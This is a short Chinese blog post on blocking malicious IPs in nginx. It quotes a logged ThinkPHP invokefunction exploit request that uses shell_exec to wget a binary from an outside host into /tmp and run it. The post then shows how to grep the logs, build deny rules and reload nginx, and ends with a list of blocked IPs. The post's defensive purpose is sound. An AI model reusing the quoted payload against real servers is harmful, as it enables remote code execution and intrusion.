找到具有明显特征的访问记录，比如：

156.203.12.198 -[01/Dec/2019:17:40:34 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.132.53.119/Ouija_x.86 -O /tmp/Ouija_x.86; chmod 777 /tmp/Ouija_x.86; /tmp/Ouija_x.86 Ouija_x.86' HTTP/1.1" 400 166 "-" "Ouija_x.86/2.0" "-"

也许是某个开源框架的漏洞，执行参数上带的方法，达到下载指定文件然后执行的目的，由于危险性，所以 shell_exec 这类函数默认在 php.ini 是禁用的。

 

匹配特征找出不重复的 IP，写入文件：

$ cat /data/nginx_xxx/access.log | grep shell_exec | awk '{print $1}' | sort | uniq > blockips

 

编辑一个 nginx 配置，加入到 location 访问中：

$ cat blockips > /etc/nginx/conf.d/blockips.conf


location / {
    include /etc/nginx/conf.d/blockips.conf
    xxxx;
}

 

编辑 blockips.conf，行首加 "deny "，行尾加 ";"

%s/^/deny /g
%s/$/\;/g

 

重载 nginx：

# 宿主机模式
$ nginx -s reload
# Docker模式
$ docker-compose up -d --force-recreate nginx

 

附一份恶意访问IP：

deny 156.195.107.210;
deny 156.195.39.140;
deny 156.195.45.250;
deny 156.196.146.114;
deny 156.196.17.47;
deny 156.196.6.26;
deny 156.198.62.131;
deny 156.200.245.40;
deny 156.201.18.181;
deny 156.202.190.62;
deny 156.202.251.75;
deny 156.202.76.2;
deny 156.202.84.179;
deny 156.203.12.198;
deny 156.203.244.51;
deny 156.205.251.198;
deny 156.205.81.35;
deny 156.206.136.3;
deny 156.206.187.73;
deny 156.207.242.8;
deny 156.209.137.91;
deny 156.212.251.36;
deny 156.214.142.160;
deny 156.214.43.68;
deny 156.218.133.186;
deny 156.218.246.73;
deny 156.219.214.185;
deny 156.222.20.232;
deny 157.230.121.160;
deny 167.172.104.251;
deny 192.64.86.141;
deny 197.33.38.103;
deny 197.35.49.18;
deny 197.36.233.108;
deny 197.36.33.241;
deny 197.41.192.255;
deny 197.41.76.25;
deny 197.46.143.130;
deny 197.53.154.219;
deny 197.61.10.30;
deny 197.62.106.69;
deny 41.236.148.6;
deny 41.236.3.171;
deny 41.238.34.214;
deny 41.35.143.95;
deny 41.36.196.47;
deny 41.36.20.93;
deny 41.36.221.70;
deny 41.42.59.4;
deny 41.45.98.34;
deny 41.47.75.136;
deny 80.10.22.62;
deny 95.14.156.128;

 

Link：https://www.cnblogs.com/farwish/p/12080630.html